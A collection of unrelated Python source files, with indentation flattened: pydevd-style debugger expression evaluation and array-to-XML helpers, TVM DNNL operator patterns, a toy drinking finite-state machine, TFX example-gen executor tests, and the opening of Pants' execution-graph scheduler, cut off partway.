# Ok, we have the initial error message, but let's see if we're dealing with a name mangling error...
try:
if '__' in expression:
# Try to handle '__' name mangling...
split = expression.split('.')
curr = locals.get(split[0])
for entry in split[1:]:
if entry.startswith('__') and not hasattr(curr, entry):
entry = '_%s%s' % (curr.__class__.__name__, entry)
curr = getattr(curr, entry)
result = curr
except:
pass
return result
def evaluate_expression(thread_id, frame_id, expression, doExec):
'''returns the result of the evaluated expression
@param doExec: determines if we should do an exec or an eval
'''
frame = find_frame(thread_id, frame_id)
if frame is None:
return
# Not using frame.f_globals because of https://sourceforge.net/tracker2/?func=detail&aid=2541355&group_id=85796&atid=577329
# (Names not resolved in generator expression in method)
# See message: http://mail.python.org/pipermail/python-list/2009-January/526522.html
updated_globals = {}
updated_globals.update(frame.f_globals)
updated_globals.update(frame.f_locals) # locals later because it has precedence over the actual globals
try:
expression = str(expression.replace('@LINE@', '\n'))
if doExec:
try:
# try to make it an eval (if it is an eval we can print it, otherwise we'll exec it and
# it will have whatever the user actually did)
compiled = compile(expression, '<string>', 'eval')
except:
Exec(expression, updated_globals, frame.f_locals)
pydevd_save_locals.save_locals(frame)
else:
result = eval(compiled, updated_globals, frame.f_locals)
if result is not None: # Only print if it's not None (as python does)
sys.stdout.write('%s\n' % (result,))
return
else:
return eval_in_context(expression, updated_globals, frame.f_locals)
finally:
# Should not be kept alive if an exception happens and this frame is kept in the stack.
del updated_globals
del frame
def change_attr_expression(thread_id, frame_id, attr, expression, dbg, value=None):
'''Changes some attribute in a given frame.
'''
frame = find_frame(thread_id, frame_id)
if frame is None:
return
try:
expression = expression.replace('@LINE@', '\n')
if dbg.plugin and not value:
result = dbg.plugin.change_variable(frame, attr, expression)
if result:
return result
if attr[:7] == "Globals":
attr = attr[8:]
if attr in frame.f_globals:
if value is None:
value = eval(expression, frame.f_globals, frame.f_locals)
frame.f_globals[attr] = value
return frame.f_globals[attr]
else:
if pydevd_save_locals.is_save_locals_available():
if value is None:
value = eval(expression, frame.f_globals, frame.f_locals)
frame.f_locals[attr] = value
pydevd_save_locals.save_locals(frame)
return frame.f_locals[attr]
# default way (only works for changing it in the topmost frame)
if value is None:
value = eval(expression, frame.f_globals, frame.f_locals)
result = value
Exec('%s=%s' % (attr, expression), frame.f_globals, frame.f_locals)
return result
except Exception:
traceback.print_exc()
MAXIMUM_ARRAY_SIZE = 100
MAX_SLICE_SIZE = 1000
def table_like_struct_to_xml(array, name, roffset, coffset, rows, cols, format):
_, type_name, _ = get_type(array)
if type_name == 'ndarray':
array, metaxml, r, c, f = array_to_meta_xml(array, name, format)
xml = metaxml
format = '%' + f
if rows == -1 and cols == -1:
rows = r
cols = c
xml += array_to_xml(array, roffset, coffset, rows, cols, format)
elif type_name == 'DataFrame':
xml = dataframe_to_xml(array, name, roffset, coffset, rows, cols, format)
else:
raise VariableError("Do not know how to convert type %s to table" % (type_name))
return "<xml>%s</xml>" % xml
def array_to_xml(array, roffset, coffset, rows, cols, format):
xml = ""
rows = min(rows, MAXIMUM_ARRAY_SIZE)
cols = min(cols, MAXIMUM_ARRAY_SIZE)
# there is no obvious rule for slicing (at least 5 choices)
if len(array) == 1 and (rows > 1 or cols > 1):
array = array[0]
if array.size > len(array):
array = array[roffset:, coffset:]
rows = min(rows, len(array))
cols = min(cols, len(array[0]))
if len(array) == 1:
array = array[0]
elif array.size == len(array):
if roffset == 0 and rows == 1:
array = array[coffset:]
cols = min(cols, len(array))
elif coffset == 0 and cols == 1:
array = array[roffset:]
rows = min(rows, len(array))
xml += "<arraydata rows=\"%s\" cols=\"%s\"/>" % (rows, cols)
for row in range(rows):
xml += "<row index=\"%s\"/>" % to_string(row)
for col in range(cols):
value = array
if rows == 1 or cols == 1:
if rows == 1 and cols == 1:
value = array[0]
else:
if rows == 1:
dim = col
else:
dim = row
value = array[dim]
if "ndarray" in str(type(value)):
value = value[0]
else:
value = array[row][col]
value = format % value
xml += var_to_xml(value, '')
return xml
def array_to_meta_xml(array, name, format):
type = array.dtype.kind
slice = name
l = len(array.shape)
# initial load, compute slice
if format == '%':
if l > 2:
slice += '[0]' * (l - 2)
for r in range(l - 2):
array = array[0]
if type == 'f':
format = '.5f'
elif type == 'i' or type == 'u':
format = 'd'
else:
format = 's'
else:
format = format.replace('%', '')
l = len(array.shape)
reslice = ""
if l > 2:
raise Exception("%s has more than 2 dimensions." % slice)
elif l == 1:
# special case with 1D arrays arr[i, :] - row, but arr[:, i] - column with equal shape and ndim
# http://stackoverflow.com/questions/16837946/numpy-a-2-rows-1-column-file-loadtxt-returns-1row-2-columns
# explanation: http://stackoverflow.com/questions/15165170/how-do-i-maintain-row-column-orientation-of-vectors-in-numpy?rq=1
# we use kind of a hack - get information about memory from C_CONTIGUOUS
is_row = array.flags['C_CONTIGUOUS']
if is_row:
rows = 1
cols = min(len(array), MAX_SLICE_SIZE)
if cols < len(array):
reslice = '[0:%s]' % (cols)
array = array[0:cols]
else:
cols = 1
rows = min(len(array), MAX_SLICE_SIZE)
if rows < len(array):
reslice = '[0:%s]' % (rows)
array = array[0:rows]
elif l == 2:
rows = min(array.shape[-2], MAX_SLICE_SIZE)
cols = min(array.shape[-1], MAX_SLICE_SIZE)
if cols < array.shape[-1] or rows < array.shape[-2]:
reslice = '[0:%s, 0:%s]' % (rows, cols)
array = array[0:rows, 0:cols]
# avoid slice duplication
if not slice.endswith(reslice):
slice += reslice
bounds = (0, 0)
if type in "biufc":
bounds = (array.min(), array.max())
xml = '<array slice=\"%s\" rows=\"%s\" cols=\"%s\" format=\"%s\" type=\"%s\" max=\"%s\" min=\"%s\"/>' % \
(slice, rows, cols, format, type, bounds[1], bounds[0])
return array, xml, rows, cols, format
def dataframe_to_xml(df, name, roffset, coffset, rows, cols, format):
"""
:type df: pandas.core.frame.DataFrame
:type name: str
:type coffset: int
:type roffset: int
:type rows: int
:type cols: int
:type format: str
"""
num_rows = min(df.shape[0], MAX_SLICE_SIZE)
num_cols = min(df.shape[1], MAX_SLICE_SIZE)
if (num_rows, num_cols) != df.shape:
df = df.iloc[0:num_rows, 0: num_cols]
slice = '.iloc[0:%s, 0:%s]' % (num_rows, num_cols)
else:
slice = ''
slice = name + slice
xml = '<array slice=\"%s\" rows=\"%s\" cols=\"%s\" format=\"\" type=\"\" max=\"0\" min=\"0\"/>\n' % \
(slice, num_rows, num_cols)
if (rows, cols) == (-1, -1):
rows, cols = num_rows, num_cols
rows = min(rows, MAXIMUM_ARRAY_SIZE)
cols = min(min(cols, MAXIMUM_ARRAY_SIZE), num_cols)
# need to precompute column bounds here before slicing!
col_bounds = [None] * cols
for col in range(cols):
dtype = df.dtypes.iloc[col].kind
if dtype in "biufc":
cvalues = df.iloc[:, col]
bounds = (cvalues.min(), cvalues.max())
else:
bounds = (0, 0)
col_bounds[col] = bounds
df = df.iloc[roffset: roffset + rows, coffset: coffset + cols]
rows, cols = df.shape
def default_format(type):
if type == 'f':
return '.5f'
elif type == 'i' or type == 'u':
return 'd'
else:
return 's'
xml += "<headerdata rows=\"%s\" cols=\"%s\">\n" % (rows, cols)
format = format.replace('%', '')
col_formats = []
for col in range(cols):
label = df.axes[1].values[col]
if isinstance(label, tuple):
label = '/'.join(label)
label = str(label)
dtype = df.dtypes.iloc[col].kind
fmt = format if (dtype == 'f' and format) else default_format(dtype)
col_formats.append('%' + fmt)
bounds = col_bounds[col]
xml += '<colheader index=\"%s\" label=\"%s\" type=\"%s\" format=\"%s\" max=\"%s\" min=\"%s\" />\n' % \
(str(col), label, dtype, fmt, bounds[1], bounds[0])
for row, label in enumerate(iter(df.axes[0])):
if isinstance(label, tuple):
label = '/'.join(label)
xml += "<rowheader index=\"%s\" label = \"%s\"/>\n" % \
(str(row), label)
xml += "</headerdata>\n"
xml += "<arraydata rows=\"%s\" cols=\"%s\"/>\n" % (rows, cols)
for row in range(rows):
xml += "<row index=\"%s\"/>\n" % str(row)
for col in range(cols):
value = df.iat[row, col]
value = col_formats[col] % value
xml += var_to_xml(value, '')
return xml
| |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""DNNL library supported operators.
There are two ways to registering a function for an op to indicate if it is
supported by DNNL.
- The first and simplest way is to use the helper so that
users only need to provide the operator name and a boolean value to indicate if
it is supported. For example:
.. code-block:: python
add = _register_external_op_helper("add")
add = _register_external_op_helper("add", True)
add = _register_external_op_helper("add", False)
- The other way is to implement the function by themselves to
check the attributes of the op and decide if it should be offloaded to DNNL.
"""
import logging
import tvm.ir
from tvm.relay import transform
from tvm.relay.build_module import bind_params_by_name
from ...dataflow_pattern import wildcard, is_op
from .register import register_pattern_table
logger = logging.getLogger("DNNL")
def _register_external_op_helper(op_name, supported=True):
"""The helper function to indicate that a given operator can be supported
by DNNL.
Paramters
---------
op_name : Str
The name of operator that will be registered.
Returns
-------
f : callable
A function that returns if the operator is supported by DNNL.
"""
@tvm.ir.register_op_attr(op_name, "target.dnnl")
def _func_wrapper(expr):
return supported
return _func_wrapper
_register_external_op_helper("nn.batch_norm")
_register_external_op_helper("nn.conv2d")
_register_external_op_helper("nn.dense")
_register_external_op_helper("nn.relu")
_register_external_op_helper("tanh")
_register_external_op_helper("sigmoid")
_register_external_op_helper("add")
_register_external_op_helper("multiply")
def make_conv_pattern(with_bias=True, with_eltwise=None):
"""Create patterns related to nn.conv2d.
Parameters
----------
with_bias : bool
Whether attach `bias_add` to `nn.conv2d`.
with_eltwise : str
The attached elementwise post-op name.
Returns
-------
conv_out : CallPattern
Call node sequence.
"""
data = wildcard()
weight = wildcard()
bias = wildcard()
conv = is_op("nn.conv2d")(data, weight)
if with_bias:
conv_out = is_op("add")(conv, bias)
else:
conv_out = conv
if with_eltwise:
return is_op(with_eltwise)(conv_out)
return conv_out
def make_dense_pattern(with_bias=True, with_eltwise=None):
"""Create patterns related to nn.dense.
Parameters
----------
with_bias : bool
Whether attach `bias_add` to `nn.dense`.
with_eltwise : str
The attached elementwise post-op name.
Returns
-------
dense_out : CallPattern
Call node sequence.
"""
data = wildcard()
weight = wildcard()
bias = wildcard()
dense = is_op("nn.dense")(data, weight)
if with_bias:
dense_out = is_op("add")(dense, bias)
else:
dense_out = dense
if with_eltwise:
dense_out = is_op(with_eltwise)(dense_out)
return dense_out
def make_dnnl_pattern(op, with_bias, with_eltwise):
"""Create dnnl patterns.
Parameters
----------
op : str
The first call node's op name.
with_bias : bool
Whether attach `bias_add` to `nn.dense`.
with_eltwise : str
The attached elementwise post-op name.
Returns
-------
pattern : Tuple(pattern_name, CallPattern)
Created pattern name, along with its CallPattern.
"""
pat_name = "dnnl." + op
pat_name += "_bias" if with_bias else ""
pat_name += ("_" + with_eltwise.split(".")[-1]) if with_eltwise else ""
if op == "conv2d":
dnnl_pattern = (pat_name, make_conv_pattern(with_bias, with_eltwise))
elif op == "dense":
dnnl_pattern = (pat_name, make_dense_pattern(with_bias, with_eltwise))
else:
logger.warning("Currently, only conv2d and dense op are supported, but got %s.", op)
dnnl_pattern = ()
return dnnl_pattern
@register_pattern_table("dnnl")
def pattern_table():
"""Create dnnl patterns.
Returns
-------
dnnl_patterns : List[dnnl_pattern]
Created patterns.
"""
elt_list = ["nn.relu", "tanh", "sigmoid", None]
dnnl_patterns = []
for with_bias in [True, False]:
for elt in elt_list:
if not with_bias and not elt:
return dnnl_patterns
dnnl_patterns.append(make_dnnl_pattern("conv2d", with_bias, elt))
dnnl_patterns.append(make_dnnl_pattern("dense", with_bias, elt))
return dnnl_patterns
def partition_for_dnnl(mod, params=None):
"""Partition the graph greedily offloading supported operators to DNNL.
Parameters
----------
mod : Module
The module to run passes on.
params : Optional[Dict[str, NDArray]]
Constant input parameters.
Returns
-------
mod : Module
Annotated and partitioned module.
"""
if params:
mod["main"] = bind_params_by_name(mod["main"], params)
seq = tvm.transform.Sequential(
[
transform.CanonicalizeOps(),
transform.InferType(),
transform.SimplifyInference(),
transform.FoldConstant(),
transform.FoldScaleAxis(),
# fold consecutive add ops to simplify pattern `conv2d-bias_add-bn-relu`
transform.SimplifyExpr(),
transform.FoldConstant(),
transform.MergeComposite(pattern_table()),
transform.AnnotateTarget("dnnl"),
transform.MergeCompilerRegions(),
transform.PartitionGraph(),
]
)
with tvm.transform.PassContext(opt_level=3):
mod = seq(mod)
return mod
| |
# coding: utf-8
# # Modelling Finite State Machines.
# In this this program we code up a small world model in python. This model is called drinking in a bar. The rules are as follows:
# * You start sober.
# * If you are sober you take a drink
# * Once you take a drink, there are three possible scenarios.
# * If you are drunk and take a drink, there is 80% chance that you will stay drunk.
# * If you are drunk and take a drink, there is 20% chance that you will pass out.
# * If you are drunk and you do not drink, there is 50% chance that you will become sober
# * If you pass out, you don't drink.
#
from __future__ import print_function, division
import random
# Author's name
__name__ = "Tarun Chhabra"
def kv(d):
"""
Pretty Print the dictionary.
"""
return '(' + ','.join(['%s: %s'%(k, d[k]) for k in sorted(d.keys()) if k[0] != "_"]) + ')'
def shuffle(lst):
"""
Shuffle a list and return it.
"""
random.shuffle(lst)
return lst
## Function to get the random value between a lower and upper bound.
randint = random.randint
class O(object):
"""
Basic Class which every other class inherits
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __repr__(self):
return self.__class__.__name__ + kv(self.__dict__)
print("Hello %s"%__name__)
class State(O):
"""
State object
"""
visit_limit = 5
def __init__(self, name):
"""
Initialize a state.
@param name: Name of the state
@return: State object with
name: Name of the state
out: List of transitions
visits: Number of times the state was visited if not declared as a loop
"""
O.__init__(self, name=name, out=[], visits = 0)
def is_stop(self):
"""
Check if state is a stop state
"""
return self.name[-1] == "."
def is_loop(self):
"""
Check if state is a possible loop state
"""
return self.name[0] == "#"
def arrive(self):
"""
Move to the state if not a loop
"""
if not self.is_loop():
self.visits += 1
assert self.visits <= State.visit_limit, "Loop Encountered"
def next(self, record):
"""
Move to next state from a list of possible transitions
"""
for trans in shuffle(self.out):
if trans.guard(record, trans):
return trans.there
return self
class Trans(O):
# Transition Class
def __init__(self, here, guard, there):
"""
@param here: starting state
@param guard: transfer function
@param there: ending state
"""
O.__init__(self, here = here, guard = guard, there = there)
class Machine(O):
def __init__(self, label, data=0):
"""
Create an instance of machine.
@param label: Label representing the machine
@param data: Data used to describe the machine. In this case you don't have any data
"""
O.__init__(self, label = label, # Label of the machine
states = {}, # Possible state of the machine
here = None, # Current state of the machine
data = data) # Data used to describe the machine
def add_state(self, name):
# Add a state to the machine.
# Create an instance of state, add it to the states map. Also if
# the current state is None, set it to this state.
# Also return the state
st = State(name)
self.states[name] = st
if self.here is None:
self.here = st
return st
def add_trans(self, *trans):
# For every transition in the list *trans, add the
# transition to the "out" list in the "here" state
for tran in trans:
tran.here.out.append(tran)
def step(self):
# Move the machine to the next state if it is currently not in the stop state.
if not self.here.is_stop():
self.here = self.here.next(self)
self.here.arrive()
class Factory(O):
"""
Factory that generates machines.
"""
def __init__(self):
"""
Initialize the factory.
"""
O.__init__(self, machines = [])
def make_machine(self, label, data=0):
# Create a new machine and add it to
# the list "machines" and return the machine
machine = Machine(label=label,data=data)
self.machines.append(machine)
return machine
def run(self, seed=1, ticks=100):
"""
Run all the machines
"""
print('Seed : ', seed)
random.seed(seed)
for _ in xrange(ticks):
alive = False
for machine in shuffle(self.machines):
if not machine.here.is_stop():
alive = True
machine.step()
self.report(machine.label)
break
if not alive: break
def report(self, name):
"""
Report the runs
"""
max_len = 50
lst = [0]*(max_len + 1)
for machine in self.machines:
lst[machine.data] += machine.label
print (machine.here)
show = lambda x: str(x if x else '.')
print(name, " | ", " ".join(map(show, lst)))
# In[22]:
drunk_chance = 0.8
passout_chance = 0.2
sober_chance = 0.5
def drunk(m, t):
"""
Transition Function for snow
@param m: instance of Machine
@param t: instance of Trans
"""
# If chance < drunk_chance, reduce the machine's energy
# by a random integer between [1, 5] and return True. Else return False
if random.random() < drunk_chance:
m.data -= randint(1,5)
return True
return False
def sober(m, t):
"""
Transition Function for grass
@param m: instance of Machine
@param t: instance of Trans
"""
# If chance < sober_chance, increase the machine's energy
# to a random integer between [1, 5] and return True. Else return False
if random.random() < sober_chance:
m.data += randint(1,5)
return True
return False
def passout(m, t):
"""
Return if chance < passout_chance.
"""
return random.random() < passout_chance
def drink(m, t):
"""
Walk from a state
:param m: machine
:param t: trans object
:return:
"""
return True
def notdrink(m,t):
return True
# In[23]:
def fsm(factory, label, data):
m = factory.make_machine(label, data)
# Using the functions and classes defined above code up the
# state machine in the figure at the top of the page.
sober = m.add_state("sober")
drunk = m.add_state("#drunk")
passout = m.add_state("passout.")
m.add_trans(Trans(sober,drink,drunk),
Trans(drunk,drink,drunk),
Trans(drunk,drink,passout),
Trans(drunk,notdrink,sober),
Trans(drunk,notdrink,drunk),)
return m
# In[24]:
f = Factory()
fsm(f, 1, 25)
fsm(f, 2, 25)
fsm(f, 4, 25)
f.run(100)
| |
# Copyright 2019 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.example_gen.base_example_gen_executor."""
import os
import apache_beam as beam
import tensorflow as tf
from tfx.components.example_gen import base_example_gen_executor
from tfx.dsl.io import fileio
from tfx.proto import example_gen_pb2
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.types import standard_component_specs
from tfx.utils import proto_utils
@beam.ptransform_fn
def _TestInputSourceToExamplePTransform(pipeline, exec_properties,
split_pattern):
mock_examples = []
size = 0
if split_pattern == 'single/*':
size = 6000
elif split_pattern == 'train/*':
size = 4000
elif split_pattern == 'eval/*':
size = 2000
assert size != 0
has_empty = exec_properties.get('has_empty', True)
for i in range(size):
feature = {}
feature['i'] = tf.train.Feature(
) if i % 10 == 0 and has_empty else tf.train.Feature(
int64_list=tf.train.Int64List(value=[i]))
feature['f'] = tf.train.Feature(
) if i % 10 == 0 and has_empty else tf.train.Feature(
float_list=tf.train.FloatList(value=[float(i)]))
feature['s'] = tf.train.Feature(
) if i % 10 == 0 and has_empty else tf.train.Feature(
bytes_list=tf.train.BytesList(value=[tf.compat.as_bytes(str(i))]))
if exec_properties.get('sequence_example', False):
feature_list = {}
feature_list['list'] = tf.train.FeatureList(feature=[feature['s']])
example_proto = tf.train.SequenceExample(
context=tf.train.Features(feature=feature),
feature_lists=tf.train.FeatureLists(feature_list=feature_list))
else:
example_proto = tf.train.Example(
features=tf.train.Features(feature=feature))
mock_examples.append(example_proto)
result = pipeline | beam.Create(mock_examples)
if exec_properties.get('format_proto', False):
result |= beam.Map(lambda x: x.SerializeToString(deterministic=True))
return result
class TestExampleGenExecutor(base_example_gen_executor.BaseExampleGenExecutor):
def GetInputSourceToExamplePTransform(self):
return _TestInputSourceToExamplePTransform
class BaseExampleGenExecutorTest(tf.test.TestCase):
def setUp(self):
super().setUp()
self._output_data_dir = os.path.join(
os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),
self._testMethodName)
# Create output dict.
self._examples = standard_artifacts.Examples()
self._examples.uri = self._output_data_dir
self._output_dict = {
standard_component_specs.EXAMPLES_KEY: [self._examples]
}
self._train_output_file = os.path.join(self._examples.uri, 'Split-train',
'data_tfrecord-00000-of-00001.gz')
self._eval_output_file = os.path.join(self._examples.uri, 'Split-eval',
'data_tfrecord-00000-of-00001.gz')
# Create exec proterties for output splits.
self._exec_properties = {
standard_component_specs.INPUT_CONFIG_KEY:
proto_utils.proto_to_json(
example_gen_pb2.Input(splits=[
example_gen_pb2.Input.Split(
name='single', pattern='single/*'),
])),
standard_component_specs.OUTPUT_CONFIG_KEY:
proto_utils.proto_to_json(
example_gen_pb2.Output(
split_config=example_gen_pb2.SplitConfig(splits=[
example_gen_pb2.SplitConfig.Split(
name='train', hash_buckets=2),
example_gen_pb2.SplitConfig.Split(
name='eval', hash_buckets=1)
])))
}
def _testDo(self):
# Run executor.
example_gen = TestExampleGenExecutor()
example_gen.Do({}, self._output_dict, self._exec_properties)
self.assertEqual(
artifact_utils.encode_split_names(['train', 'eval']),
self._examples.split_names)
# Check example gen outputs.
self.assertTrue(fileio.exists(self._train_output_file))
self.assertTrue(fileio.exists(self._eval_output_file))
# Output split ratio: train:eval=2:1.
self.assertGreater(
fileio.open(self._train_output_file).size(),
fileio.open(self._eval_output_file).size())
def testDoInputSplit(self):
# Create exec proterties for input split.
self._exec_properties = {
standard_component_specs.INPUT_CONFIG_KEY:
proto_utils.proto_to_json(
example_gen_pb2.Input(splits=[
example_gen_pb2.Input.Split(
name='train', pattern='train/*'),
example_gen_pb2.Input.Split(name='eval', pattern='eval/*')
])),
standard_component_specs.OUTPUT_CONFIG_KEY:
proto_utils.proto_to_json(example_gen_pb2.Output())
}
self._testDo()
def testDoOutputSplit(self):
self._testDo()
def testDoOutputSplitWithProto(self):
# Update exec proterties.
self._exec_properties['format_proto'] = True
self._testDo()
def testDoOutputSplitWithSequenceExample(self):
# Update exec proterties.
self._exec_properties['sequence_example'] = True
self._testDo()
def _testFeatureBasedPartition(self, partition_feature_name):
self._exec_properties[
standard_component_specs.OUTPUT_CONFIG_KEY] = proto_utils.proto_to_json(
example_gen_pb2.Output(
split_config=example_gen_pb2.SplitConfig(
splits=[
example_gen_pb2.SplitConfig.Split(
name='train', hash_buckets=2),
example_gen_pb2.SplitConfig.Split(
name='eval', hash_buckets=1)
],
partition_feature_name=partition_feature_name)))
def testFeatureBasedPartition(self):
# Update exec proterties.
self._testFeatureBasedPartition('i')
self._exec_properties['has_empty'] = False
self._testDo()
def testFeatureBasedPartitionWithSequenceExample(self):
# Update exec proterties.
self._testFeatureBasedPartition('i')
self._exec_properties['has_empty'] = False
self._exec_properties['sequence_example'] = True
self._testDo()
def testInvalidFeatureName(self):
# Update exec proterties.
self._testFeatureBasedPartition('invalid')
# Run executor.
example_gen = TestExampleGenExecutor()
with self.assertRaisesRegex(RuntimeError,
'Feature name `.*` does not exist.'):
example_gen.Do({}, self._output_dict, self._exec_properties)
def testEmptyFeature(self):
# Update exec proterties.
self._testFeatureBasedPartition('i')
# Run executor.
example_gen = TestExampleGenExecutor()
with self.assertRaisesRegex(
RuntimeError, 'Partition feature does not contain any value.'):
example_gen.Do({}, self._output_dict, self._exec_properties)
def testInvalidFloatListFeature(self):
# Update exec proterties.
self._testFeatureBasedPartition('f')
self._exec_properties['has_empty'] = False
# Run executor.
example_gen = TestExampleGenExecutor()
with self.assertRaisesRegex(
RuntimeError,
'Only `bytes_list` and `int64_list` features are supported for partition.'
):
example_gen.Do({}, self._output_dict, self._exec_properties)
def testInvalidFeatureBasedPartitionWithProtos(self):
# Update exec proterties.
self._testFeatureBasedPartition('i')
self._exec_properties['has_empty'] = False
self._exec_properties['format_proto'] = True
# Run executor.
example_gen = TestExampleGenExecutor()
with self.assertRaisesRegex(
RuntimeError, 'Split by `partition_feature_name` is only supported '
'for FORMAT_TF_EXAMPLE and FORMAT_TF_SEQUENCE_EXAMPLE payload format.'):
example_gen.Do({}, self._output_dict, self._exec_properties)
if __name__ == '__main__':
tf.test.main()
| |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import queue
import sys
import threading
import traceback
from collections import defaultdict, deque
from heapq import heappop, heappush
from pants.base.worker_pool import Work
from pants.util.contextutil import Timer
class Job:
"""A unit of scheduling for the ExecutionGraph.
The ExecutionGraph represents a DAG of dependent work. A Job a node in the graph along with the
keys of its dependent jobs.
"""
def __init__(
self,
key,
fn,
dependencies,
size=0,
on_success=None,
on_failure=None,
run_asap=False,
duration=None,
options_scope=None,
target=None,
):
"""
:param key: Key used to reference and look up jobs
:param fn callable: The work to perform
:param dependencies: List of keys for dependent jobs
:param size: Estimated job size used for prioritization
:param on_success: Zero parameter callback to run if job completes successfully. Run on main
thread.
:param on_failure: Zero parameter callback to run if job completes successfully. Run on main
thread.
:param run_asap: Boolean indicating whether or not to queue job immediately once unblocked.
"""
self.key = key
self.fn = fn
self.dependencies = dependencies
self.size = size
self.on_success = on_success
self.on_failure = on_failure
self.run_asap = run_asap
self.duration = duration
self.options_scope = options_scope
self.target = target
def __call__(self):
self.fn()
def run_success_callback(self):
if self.on_success:
self.on_success()
def run_failure_callback(self):
if self.on_failure:
self.on_failure()
UNSTARTED = "Unstarted"
QUEUED = "Queued"
SUCCESSFUL = "Successful"
FAILED = "Failed"
CANCELED = "Canceled"
RUNNING = "Running"
class StatusTable:
DONE_STATES = {SUCCESSFUL, FAILED, CANCELED}
def __init__(self, keys, pending_dependencies_count):
self._statuses = {key: UNSTARTED for key in keys}
self._pending_dependencies_count = pending_dependencies_count
def mark_as(self, state, key):
self._statuses[key] = state
def mark_queued(self, key):
self.mark_as(QUEUED, key)
def unfinished_items(self):
"""Returns a list of (name, status) tuples, only including entries marked as unfinished."""
return [(key, stat) for key, stat in self._statuses.items() if stat not in self.DONE_STATES]
def failed_keys(self):
return [key for key, stat in self._statuses.items() if stat == FAILED]
def is_unstarted(self, key):
return self._statuses.get(key) is UNSTARTED
def mark_one_successful_dependency(self, key):
self._pending_dependencies_count[key] -= 1
def is_ready_to_submit(self, key):
return self.is_unstarted(key) and self._pending_dependencies_count[key] == 0
def are_all_done(self):
return all(s in self.DONE_STATES for s in self._statuses.values())
def has_failures(self):
return any(stat is FAILED for stat in self._statuses.values())
class ExecutionFailure(Exception):
"""Raised when work units fail during execution."""
def __init__(self, message, cause=None):
if cause:
message = f"{message}: {str(cause)}"
super().__init__(message)
self.cause = cause
class UnexecutableGraphError(Exception):
"""Base exception class for errors that make an ExecutionGraph not executable."""
def __init__(self, msg):
super().__init__(f"Unexecutable graph: {msg}")
class NoRootJobError(UnexecutableGraphError):
def __init__(self):
super().__init__(
"All scheduled jobs have dependencies. There must be a circular dependency."
)
class UnknownJobError(UnexecutableGraphError):
def __init__(self, undefined_dependencies):
super().__init__(
"Undefined dependencies {}".format(", ".join(map(repr, undefined_dependencies)))
)
class JobExistsError(UnexecutableGraphError):
def __init__(self, key):
super().__init__(f"Job already scheduled {key!r}")
class ThreadSafeCounter:
def __init__(self):
self.lock = threading.Lock()
self._counter = 0
def get(self):
with self.lock:
return self._counter
def increment(self):
with self.lock:
self._counter += 1
def decrement(self):
with self.lock:
self._counter -= 1
class ExecutionGraph:
"""A directed acyclic graph of work to execute.
This is currently only used within jvm compile, but the intent is to unify it with the future
global execution graph.
"""
def __init__(self, job_list, print_stack_trace):
"""
:param job_list Job: list of Jobs to schedule and run.
"""
self._print_stack_trace = print_stack_trace
self._dependencies = defaultdict(list)
self._dependees = defaultdict(list)
self._jobs = {}
self._job_keys_as_scheduled = []
self._job_keys_with_no_dependencies = []
for job in job_list:
self._schedule(job)
unscheduled_dependencies = set(self._dependees.keys()) - set(self._job_keys_as_scheduled)
if unscheduled_dependencies:
raise UnknownJobError(unscheduled_dependencies)
if len(self._job_keys_with_no_dependencies) == 0:
raise NoRootJobError()
self._job_priority = self._compute_job_priorities(job_list)
def format_dependee_graph(self):
def entry(key):
dependees = self._dependees[key]
if dependees:
return "{} <- {{\n {}\n}}".format(key, ",\n ".join(dependees))
else:
return f"{key} <- {{}}"
return "\n".join([entry(key) for key in self._job_keys_as_scheduled])
def _schedule(self, job):
key = job.key
dependency_keys = job.dependencies
self._job_keys_as_scheduled.append(key)
if key in self._jobs:
raise JobExistsError(key)
self._jobs[key] = job
if len(dependency_keys) == 0:
self._job_keys_with_no_dependencies.append(key)
self._dependencies[key] = dependency_keys
for dependency_key in dependency_keys:
self._dependees[dependency_key].append(key)
def _compute_job_priorities(self, job_list):
"""Walks the dependency graph breadth-first, starting from the most dependent tasks, and
computes the job priority as the sum of the jobs sizes along the critical path."""
job_size = {job.key: job.size for job in job_list}
job_priority = defaultdict(int)
bfs_queue = deque()
for job in job_list:
if len(self._dependees[job.key]) == 0:
job_priority[job.key] = job_size[job.key]
bfs_queue.append(job.key)
satisfied_dependees_count = defaultdict(int)
while len(bfs_queue) > 0:
job_key = bfs_queue.popleft()
for dependency_key in self._dependencies[job_key]:
job_priority[dependency_key] = max(
job_priority[dependency_key], job_size[dependency_key] + job_priority[job_key]
)
satisfied_dependees_count[dependency_key] += 1
if satisfied_dependees_count[dependency_key] == len(
self._dependees[dependency_key]
):
bfs_queue.append(dependency_key)
max_priority = max(job_priority.values())
immediate_priority = max_priority + 1
for job in job_list:
if job.run_asap:
job_priority[job.key] = immediate_priority
return job_priority
def execute(self, pool, log):
"""Runs scheduled work, ensuring all dependencies for each element are done before
execution.
:param pool: A WorkerPool to run jobs on
:param log: logger for logging debug information and progress
submits all the work without any dependencies to the worker pool
when a unit of work finishes,
if it is successful
calls success callback
checks for dependees whose dependencies are all successful, and submits them
if it fails
calls failure callback
marks dependees as failed and queues them directly into the finished work queue
when all work is either successful or failed,
cleans up the work pool
if there's an exception on the main thread,
calls failure callback for unfinished work
aborts work pool
re-raises
"""
log.debug(self.format_dependee_graph())
status_table = StatusTable(
self._job_keys_as_scheduled,
